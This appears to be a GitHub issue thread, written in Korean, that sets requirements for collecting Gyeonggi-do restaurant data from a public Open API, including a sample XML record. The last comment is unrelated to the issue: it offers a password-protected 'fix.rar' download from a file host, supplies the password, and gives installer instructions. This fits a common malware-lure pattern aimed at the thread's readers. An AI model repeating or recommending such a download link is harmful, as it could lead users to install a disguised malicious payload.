### ISSUE TITLE
[Feat] 데이터 수집 open API

### ISSUE THREAD

**Issue by Minerva08** [wanted-august-8/matzip_rec#12]
## 요구사항

> - [[공공데이터포털](https://www.data.go.kr/tcs/dss/selectDataSetList.do?dType=API&keyword=%EA%B2%BD%EA%B8%B0%EB%8F%84+%EC%9D%BC%EB%B0%98%EC%9D%8C%EC%8B%9D%EC%A0%90&operator=AND&detailKeyword=&publicDataPk=&recmSe=&detailText=&relatedKeyword=&commaNotInData=&commaAndData=&commaOrData=&must_not=&tabId=&dataSetCoreTf=&coreDataNm=&sort=_score&relRadio=&orgFullName=&orgFilter=&org=&orgSearch=&currentPage=1&perPage=10&brm=&instt=&svcType=&kwrdArray=&extsn=&coreDataNmArray=&pblonsipScopeCode=)](https://www.data.go.kr/tcs/dss/selectDataSetList.do?dType=API&keyword=%EA%B2%BD%EA%B8%B0%EB%8F%84+%EC%9D%BC%EB%B0%98%EC%9D%8C%EC%8B%9D%EC%A0%90&operator=AND&detailKeyword=&publicDataPk=&recmSe=&detailText=&relatedKeyword=&commaNotInData=&commaAndData=&commaOrData=&must_not=&tabId=&dataSetCoreTf=&coreDataNm=&sort=_score&relRadio=&orgFullName=&orgFilter=&org=&orgSearch=&currentPage=1&perPage=10&brm=&instt=&svcType=&kwrdArray=&extsn=&coreDataNmArray=&pblonsipScopeCode=) 로 접속하여 연동할 Open API 규격을 확인합니다.
> - **개발자 키 발급 절차**
> - **경기도_일반음식점(xx) 에 해당하는 OpenAPI 중 3가지 이상 수집에 사용합니다.(한식, 중식, 일식 등)**
> - `Open API` 에 포함된 모든 필드 포함.(데이터 형태에 따라 필드 형식 고려) >
>     
>     ```markdown
>     <SIGUN_NM>안양시</SIGUN_NM>
>         <SIGUN_CD/>
>         <BIZPLC_NM>시시마루</BIZPLC_NM>
>         <LICENSG_DE>19990201</LICENSG_DE>
>         <BSN_STATE_NM>영업</BSN_STATE_NM>
>         <CLSBIZ_DE/>
>         <LOCPLC_AR/>
>         <GRAD_FACLT_DIV_NM/>
>         <MALE_ENFLPSN_CNT>0</MALE_ENFLPSN_CNT>
>         <YY/>
>         <MULTI_USE_BIZESTBL_YN/>
>         <GRAD_DIV_NM/>
>         <TOT_FACLT_SCALE/>
>         <FEMALE_ENFLPSN_CNT>0</FEMALE_ENFLPSN_CNT>
>         <BSNSITE_CIRCUMFR_DIV_NM>기타</BSNSITE_CIRCUMFR_DIV_NM>
>         <SANITTN_INDUTYPE_NM/>
>         <SANITTN_BIZCOND_NM>정종/대포집/소주방</SANITTN_BIZCOND_NM>
>         <TOT_EMPLY_CNT/>
>         <REFINE_LOTNO_ADDR>경기도 안양시 동안구 관양동 1602-6번지</REFINE_LOTNO_ADDR>
>         <REFINE_ROADNM_ADDR>경기도 안양시 동안구 관평로182번길 23 (관양동, 무지개상가103호)</REFINE_ROADNM_ADDR>
>         <REFINE_ZIP_CD>14066</REFINE_ZIP_CD>
>         <REFINE_WGS84_LOGT>126.9615971924</REFINE_WGS84_LOGT>
>         <REFINE_WGS84_LAT>37.3937521667</REFINE_WGS84_LAT>
>     **평점**
>     ```
>     
>     - 내부 모델명 및 필드명 자율적으로 설정 가능.
>     - 참고, 하위 기능 개발 중에서 추가 필드도 생성 예정입니다.(평점 등)

---
## Response
**Success**
- 200 OK

**Failure**
- 404 Not Found
  - ErrorCode 설명

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
